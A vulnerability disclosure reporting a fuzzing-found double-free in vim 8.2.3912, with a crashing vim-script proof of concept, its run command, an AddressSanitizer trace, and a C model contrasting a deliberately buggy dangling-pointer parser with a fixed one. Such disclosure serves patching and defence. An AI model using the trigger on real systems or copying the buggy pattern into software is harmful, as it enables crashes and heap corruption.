7.8 High (CVSS3)
Attack Vector: LOCAL
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
6.8 Medium (CVSS2)
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EPSS: 0.001 Low, percentile 40.3%
Hello there! Hope you are having an awesome day! 🤗
After I saw Rick de Jager's latest report, I decided to pick up their PoC as an input for fuzzing vim at patch 8.2.3912, and ended up finding a new case of double-free!
For testing, I compiled vim with GCC 9.3.0, and my OS is Linux Mint 20.04 amd64.
Save the following file as poc:
def FirstFunction()
def SecondFunction(
)
# Notice that the issue still happens if the right parenthesis
# of the second function ends up on the next line
enddef|BBBB
enddef
# Compile all functions
defcompile
After that, run vim with the following command:
vim -u NONE -X -Z -e -s -S poc -c :qa!
Running this should produce a double-free report, first from glibc's tcache check and, in an AddressSanitizer build, the trace below:
vim -u NONE -X -Z -e -s -S poc -c :qa!
free(): double free detected in tcache 2
Aborted (core dumped)
=================================================================
==802955==ERROR: AddressSanitizer: attempting double-free on 0x604000000410 in thread T0:
#0 0x449add in free (/home/exceed/Documents/fuzzing/vimtest/vim/src/vim+0x449add)
#1 0x11f3de5 in vim_free /home/exceed/Documents/fuzzing/vimtest/vim/src/alloc.c:619:2
#2 0x11f3de5 in get_function_body /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:843:8
#3 0x121b313 in define_function /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:4371:9
#4 0x1268bed in compile_nested_function /home/exceed/Documents/fuzzing/vimtest/vim/src/vim9compile.c:881:13
#5 0x1268bed in compile_def_function /home/exceed/Documents/fuzzing/vimtest/vim/src/vim9compile.c:2870:14
#6 0x12240ef in ex_defcompile /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:4705:9
#7 0x7ea32b in do_one_cmd /home/exceed/Documents/fuzzing/vimtest/vim/src/ex_docmd.c:2572:2
#8 0x7ea32b in do_cmdline /home/exceed/Documents/fuzzing/vimtest/vim/src/ex_docmd.c:994:17
#9 0xef5d80 in do_source /home/exceed/Documents/fuzzing/vimtest/vim/src/scriptfile.c:1423:5
#10 0xf035b7 in cmd_source /home/exceed/Documents/fuzzing/vimtest/vim/src/scriptfile.c:985:14
#11 0xf035b7 in ex_source /home/exceed/Documents/fuzzing/vimtest/vim/src/scriptfile.c:1011:2
#12 0x7ea32b in do_one_cmd /home/exceed/Documents/fuzzing/vimtest/vim/src/ex_docmd.c:2572:2
#13 0x7ea32b in do_cmdline /home/exceed/Documents/fuzzing/vimtest/vim/src/ex_docmd.c:994:17
#14 0x14c1e61 in do_cmdline_cmd /home/exceed/Documents/fuzzing/vimtest/vim/src/ex_docmd.c:588:12
#15 0x14c1e61 in exe_commands /home/exceed/Documents/fuzzing/vimtest/vim/src/main.c:3080:2
#16 0x14c1e61 in vim_main2 /home/exceed/Documents/fuzzing/vimtest/vim/src/main.c:774:2
#17 0x14b9920 in main /home/exceed/Documents/fuzzing/vimtest/vim/src/main.c:426:12
#18 0x7fd8d254a0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#19 0x3cfced in _start (/home/exceed/Documents/fuzzing/vimtest/vim/src/vim+0x3cfced)
0x604000000410 is located 0 bytes inside of 34-byte region [0x604000000410,0x604000000432)
freed by thread T0 here:
#0 0x449add in free (/home/exceed/Documents/fuzzing/vimtest/vim/src/vim+0x449add)
#1 0x11ea6ed in vim_free /home/exceed/Documents/fuzzing/vimtest/vim/src/alloc.c:619:2
#2 0x11ea6ed in get_function_args /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:221:6
#3 0x1219def in define_function /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:4258:9
#4 0x1268bed in compile_nested_function /home/exceed/Documents/fuzzing/vimtest/vim/src/vim9compile.c:881:13
#5 0x1268bed in compile_def_function /home/exceed/Documents/fuzzing/vimtest/vim/src/vim9compile.c:2870:14
#6 0x12240ef in ex_defcompile /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:4705:9
previously allocated by thread T0 here:
#0 0x449d5d in malloc (/home/exceed/Documents/fuzzing/vimtest/vim/src/vim+0x449d5d)
#1 0x47d1d6 in lalloc /home/exceed/Documents/fuzzing/vimtest/vim/src/alloc.c:244:11
SUMMARY: AddressSanitizer: double-free (/home/exceed/Documents/fuzzing/vimtest/vim/src/vim+0x449add) in free
==802955==ABORTING
Use-after-frees and double frees corrupt heap memory, which can cause a crash or other undefined (and potentially exploitable) behaviour.
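The ownership mix-up the trace shows (one free in get_function_args at userfunc.c:221, a second in get_function_body at userfunc.c:843) modelled in C as an added example that is not vim's code: the function names are hypothetical stand-ins, and the tracking allocator is constructed so the second free is counted rather than aborting the process.

```c
#include <stdlib.h>
#include <string.h>
/* Constructed tracking allocator: a second free of the same block is counted
 * instead of aborting the way glibc's "double free detected in tcache 2" did. */
typedef struct { int freed; } block_t;
static block_t *live[16];
static int n_live, double_frees;
static block_t *block_alloc(void) {
    block_t *b = calloc(1, sizeof *b);
    live[n_live++] = b;                  /* released again in reset_tracker() */
    return b;
}
static void block_free(block_t *b) {
    if (b == NULL) return;               /* like vim_free(): NULL is a no-op */
    if (b->freed) { double_frees++; return; }
    b->freed = 1;
}
static void reset_tracker(void) {
    while (n_live > 0) free(live[--n_live]);
    double_frees = 0;
}

/* Hypothetical stand-ins for get_function_args(): parsing fails when ')' is
 * not on the same line, as in the PoC. The buggy variant frees the argument
 * list but leaves the caller's pointer dangling; the fixed one clears it. */
static int parse_args_buggy(const char *line, block_t **args) {
    *args = block_alloc();
    if (strchr(line, ')') == NULL) { block_free(*args); return -1; }
    return 0;
}
static int parse_args_fixed(const char *line, block_t **args) {
    *args = block_alloc();
    if (strchr(line, ')') == NULL) { block_free(*args); *args = NULL; return -1; }
    return 0;
}
/* Stand-in for define_function()/get_function_body(): releases what it still
 * believes it owns, which on the buggy error path is the trace's second free. */
static int define_function(const char *line, int (*parse_args)(const char *, block_t **)) {
    block_t *args = NULL;
    int rc = parse_args(line, &args);
    block_free(args);
    return rc;
}
/* Number of double frees one parser variant produces for a single "def" line. */
static int count_double_frees(const char *line, int (*parse_args)(const char *, block_t **)) {
    reset_tracker();
    define_function(line, parse_args);
    return double_frees;
}
```

Clearing the pointer right after freeing it (the pattern vim's VIM_CLEAR() macro encodes) is the cheap defence against this bug class; glibc's tcache check and AddressSanitizer are what turn the silent corruption into the abort shown in the report.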